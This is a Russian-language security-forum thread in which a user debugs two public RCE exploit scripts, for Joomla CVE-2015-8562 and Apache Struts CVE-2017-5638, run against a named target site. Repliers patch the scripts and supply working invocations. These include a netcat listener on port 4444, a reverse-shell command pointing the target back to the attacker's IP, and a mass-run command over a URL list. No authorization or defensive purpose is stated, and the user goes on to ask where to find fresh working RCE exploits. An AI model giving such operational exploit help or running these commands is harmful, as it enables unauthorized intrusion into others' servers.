Toggle sidebar

CVE-2015-8562

  • Автор темы Автор темы kamaz
  • Дата начала Дата начала
  • Теги Теги
    cve-2017-5638
K

kamaz

привет!
пробую эксплойт с све из заголовка,получаю такую ошибку

[+] Attacking: mytarget.com
Traceback (most recent call last):
File "rce.py", line 155, in <module>
main()
File "rce.py", line 151, in main
x.exploit_target(target, ip, port)
File "rce.py", line 111, in exploit_target
print("[+] Target IP: " + socket.gethostbyname(url.split('/')[2]))
IndexError: list index out of range

пробую второй с све-CVE-2017-5638
# python CVE-2017-5638.py
Traceback (most recent call last):
File "CVE-2017-5638.py", line 11, in <module>
strutz = open(sys.argv[1], "r").readlines()
IndexError: list index out of range

мог бы кто-то указать на мои ошибки

спасибо
 
Сортировать по дате Сортировать по голосам
kamaz сказал(а):
привет!
пробую эксплойт с све из заголовка,получаю такую ошибку

[+] Attacking: mytarget.com
Traceback (most recent call last):
File "rce.py", line 155, in <module>
main()
File "rce.py", line 151, in main
x.exploit_target(target, ip, port)
File "rce.py", line 111, in exploit_target
print("[+] Target IP: " + socket.gethostbyname(url.split('/')[2]))
IndexError: list index out of range

пробую второй с све-CVE-2017-5638
# python CVE-2017-5638.py
Traceback (most recent call last):
File "CVE-2017-5638.py", line 11, in <module>
strutz = open(sys.argv[1], "r").readlines()
IndexError: list index out of range

мог бы кто-то указать на мои ошибки

спасибо
Нажмите, чтобы раскрыть...
Напиши, а как ты их запускаешь ? python
Ссылка скрыта от гостей
с последующими аргументами, если да, то кинь ссылку на эксплоиты
 
  • Нравится
Реакции: kamaz
За 0 Против
первый запускаю так

неткатом открываю порт 4444

после в терминале

python rce.py --target=mytarget.com --ip=myip --port=4444
 
За 0 Против
ссылки
hыы://github.com/r0otshell/Apache-Struts2-RCE-Exploit-v2-CVE-2017-5638
ыы://github.com/anarcoder/CVE-2015-8562

в python rce.py-h это все взял там знаки стоят
второй даже хелп не отображает

тему можно закрывать ,DefWolf дал исчерпывающую информацию!за что ему большое человеческое спасибо!
 
За 0 Против
https://github.com/r0otshell/Apache...v2-CVE-2017-5638/blob/master/CVE-2017-5638.py
В этом сплойте тебя просили указать имя файла,где содержаться урл,можешь заменить 11 строку,если тебе нужен только один сайт и ты не хочешь париться на эту
Python: 
strutz = [raw_input('')]

Что касается этого... https://github.com/anarcoder/CVE-2015-8562/blob/master/rce.py
Я могу лишь преположить,что разработчик допустил ошибку...хотяя...
Крч убирай в 110 строчке
Код: 
.split('/')[2]

(Это я для будущего поколения расписал)
 
  • Нравится
Реакции: kamaz
За 0 Против
Tayler сказал(а):
https://github.com/r0otshell/Apache...v2-CVE-2017-5638/blob/master/CVE-2017-5638.py
В этом сплойте тебя просили указать имя файла,где содержаться урл,можешь заменить 11 строку,если тебе нужен только один сайт и ты не хочешь париться на эту
Python: 
strutz = [raw_input('')]

Что касается этого... https://github.com/anarcoder/CVE-2015-8562/blob/master/rce.py
Я могу лишь преположить,что разработчик допустил ошибку...хотяя...
Крч убирай в 110 строчке
Код: 
.split('/')[2]

(Это я для будущего поколения расписал)
Нажмите, чтобы раскрыть...
граматно,спасибо что не прошли мимо!
Подскажите где найти рабочие RCE эксплойты,где мониторить новые,может фраймворк существует какой-тов общем жилание знать все на эту тему.
спасибо

Tayler сказал(а):
https://github.com/r0otshell/Apache...v2-CVE-2017-5638/blob/master/CVE-2017-5638.py
В этом сплойте тебя просили указать имя файла,где содержаться урл,можешь заменить 11 строку,если тебе нужен только один сайт и ты не хочешь париться на эту
Python: 
strutz = [raw_input('')]

Что касается этого... https://github.com/anarcoder/CVE-2015-8562/blob/master/rce.py
Я могу лишь преположить,что разработчик допустил ошибку...хотяя...
Крч убирай в 110 строчке
Код: 
.split('/')[2]

(Это я для будущего поколения расписал)
Нажмите, чтобы раскрыть...

теперь такая ошибка
File "rce.py", line 113
headers = {'User-Agent': user_agent,
^
SyntaxError: invalid syntax
 
За 0 Против
Ахтунг! Код работает без правок!

Код: 
python3 rce.py --target='http://someshit.com' --ip='yourip' --port=4444

Второй тоже без проблем:

Код: 
python CVE-2017-5638.py urls.txt ls
 

Вложения

  • Screenshot at 2018-01-14 17-51-44.png
    Screenshot at 2018-01-14 17-51-44.png
    7,4 КБ · Просмотры: 613
  • Screenshot at 2018-01-14 17-56-22.png
    Screenshot at 2018-01-14 17-56-22.png
    9,3 КБ · Просмотры: 576
Последнее редактирование:
За 0 Против
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

Похожие темы

M4x
Writeup Веселый RSA [Writeup]
Ответы
0
Просмотры
1 тыс.
CTF-соревнования и write-ups – Hackerlab, HTB, THM
M4x
M4x
User17
  • Статья Статья
Статья Тайны Сайтов Раскрыты: OSINT Инструменты для Глубокой Разведки
Ответы
1
Просмотры
2 тыс.
OSINT и Форензика
rasput2
R
ustatep
  • Вопрос Вопрос
secretsocks проблема с установкой
Ответы
1
Просмотры
1 тыс.
Вопросы и Ответы по ИБ (Q&A)
f22
f22
W
  • Вопрос Вопрос
Ошибка при запуске exploit. python
Ответы
1
Просмотры
2 тыс.
Вопросы и Ответы по ИБ (Q&A)
B13
B

Hacker Lab

Категории

CTF и практические задания
128
Linux и инфраструктура
32
Анонимность и приватность
121
Инструменты пентестера
169
Искусственный интеллект и ИБ
4
Кибербезопасность
689
Конкурсы и активности
62
Криптография и шифрование
52
Мобильная безопасность
41
Новости и события
143
Программирование для ИБ
227
Работа и обучение в ИБ
123
Сетевые технологии
24
Форензика и OSINT
192

Наши курсы

Пользователи онлайн

Всего: 624 (пользователей: 8, гостей: 616)

Статистика форума

Темы
50 740
Сообщения
345 433
Пользователи
138 657
Новый пользователь
Iparpota
Верх Низ
Назад